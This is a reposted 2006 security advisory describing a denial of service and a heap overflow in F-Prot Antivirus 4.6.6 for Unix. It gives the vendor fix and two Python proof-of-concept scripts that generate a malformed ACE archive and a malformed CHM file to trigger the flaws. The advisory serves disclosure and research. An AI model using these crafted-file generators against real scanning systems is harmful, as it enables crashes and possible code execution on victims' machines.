|
 |
| SecurityReason | ||
| WLB | ||
| RSS | ||
| Corporate | ||
| Services | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
| Details : SecurityAlert | ||||
 SecurityAlert : 1998 CVE : CVE-2006-6352 SecurityRisk : High  (About) Remote Exploit : Yes Local Exploit : Yes Exploit Given : Yes Credit : Evgeny Legerov Published : 08.12.2006
Advisory Text : Name: F-Prot Antivirus for Unix: heap overflow and Denial of Service Vendor: http://www.f-prot.com Release date: 4 Dec, 2006 URL: http://gleg.net/fprot.txt Author: Evgeny Legerov <research (at) gleg (dot) net [email concealed]> I. DESCRIPTION Two vulnerabilities in F-Prot Antivirus 4.6.6 for Unix platforms could allow a remote attacker to cause a DoS or execute an arbitrary code. II. DETAILS 1. ACE file Denial of Service When parsing a specially crafted ACE compressed file F-Prot Antivirus will enter in an infinite loop. See fprot1.py for more details. 2. CHM file heap overflow When parsing a specially crafted CHM file a heap overflow will occur in F-Prot Antivirus. See fprot2.py for more details. III. VENDOR RESPONSE Update to F-Prot 4.6.7: http://www.f-prot.com/news/gen_news/061201_release_unix467.html IV. EXPLOITS # fprot1.py - trivial proof of concept code for F-Prot 4.6.6 .ACE DoS # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # # To test this code on Linux: # # create ACE compressed file # $ ./fprot1.py > 1.ace # $ f-prot 1.ace import sys import struct ACE=""" 58 c5 31 00 00 00 90 2a 2a 41 43 45 2a 2a 14 14 02 00 31 12 82 33 b6 45 97 7d 00 00 00 00 16 2a 55 4e 52 45 47 49 53 54 45 52 45 44 20 56 45 52 53 49 4f 4e 2a 6c 28 2c 00 01 01 00 d0 ff ff ff 00 00 00 00 41 42 43 44 41 42 43 44 00 00 00 00 02 05 41 41 41 41 0d 00 41 41 41 41 41 41 41 41 41 41 41 41 41 """ s = "" for i in [chr(int(i, 16)) for i in ACE.split(" ") if len(i.strip()) > 0]: s += i sys.stdout.write(s) # fprot2.py - trivial proof of concept code for F-Prot 4.6.6 .CHM heap # overflow # # Copyright (c) 2006 Evgeny Legerov # # Permission to use, copy, modify, and distribute this software for any # purpose with or without fee is hereby granted, provided that the above # copyright notice and this permission notice appear in all copies. # # THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES # WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF # MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR # ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN # ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF # OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. # # $ ./fprot2.py > 1.chm # $ f-prot 1.chm import sys import struct s="" s+="ITSF" # signature s+=struct.pack("<L",3) # version s+=struct.pack("<L",96) # header_len s+=struct.pack("<L",1) # unknown s+=struct.pack("<L",0x41424344) # last_modified s+=struct.pack("<L",0x419) # lang_id s+="A"*16 #dir_clsid s+="B"*16 #stream_clsid s+=struct.pack("<L",96) + "x00" * 4 #sec0_offset s+=struct.pack("<L",24) + "x00" * 4 #sec0_len s+=struct.pack("<L",120) + "x00" *4 #dir_offset s+=struct.pack("<L",4180) + "x00" * 4 #dir_len s+=struct.pack("<L",4300) + "x00"*4 #data_offset s+="A"*24 s+="ITSP" s+=struct.pack("<L", 1) # version s+=struct.pack("<L",0x54) # header_len s+=struct.pack("<L", 0xa) # unknown s+=struct.pack("<L",1000) # block_len - BUG? s+=struct.pack("<L",2) # blockidx s+=struct.pack("<L", 1) # index_depth s+=struct.pack("<L", -1) # index_root s+=struct.pack("<L",0) # index_head s+=struct.pack("<L",0) # index_tail s+=struct.pack("<L", -1) # unknown2 s+=struct.pack("<L",1) # num_blocks s+=struct.pack("<L", 1033) # lang_id s+="A"*32 s+="B"*10000 sys.stdout.write(s) V. CREDIT Discovered by Evgeny Legerov. The vulnerabilities are part of VulnDisco Pack for CANVAS since Sep, 2006. Feedback : If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com. |
||||
| Alert | ||
Microsoft VISTA TCP/IP stack buffer overflow
Microsoft Device IO Control wrapped by the iphlpapi.dll API shipping with Windows Vista 32 bit and 64 bit contains a possibly exploitable, buffer overflow corrupting kernel memory. |
||
| Apache |  |
|
» Apache Tomcat <= |
||
| PHP | |
|
- 2008-11-27| Copyright © SecurityReason. All Rights Reserved. |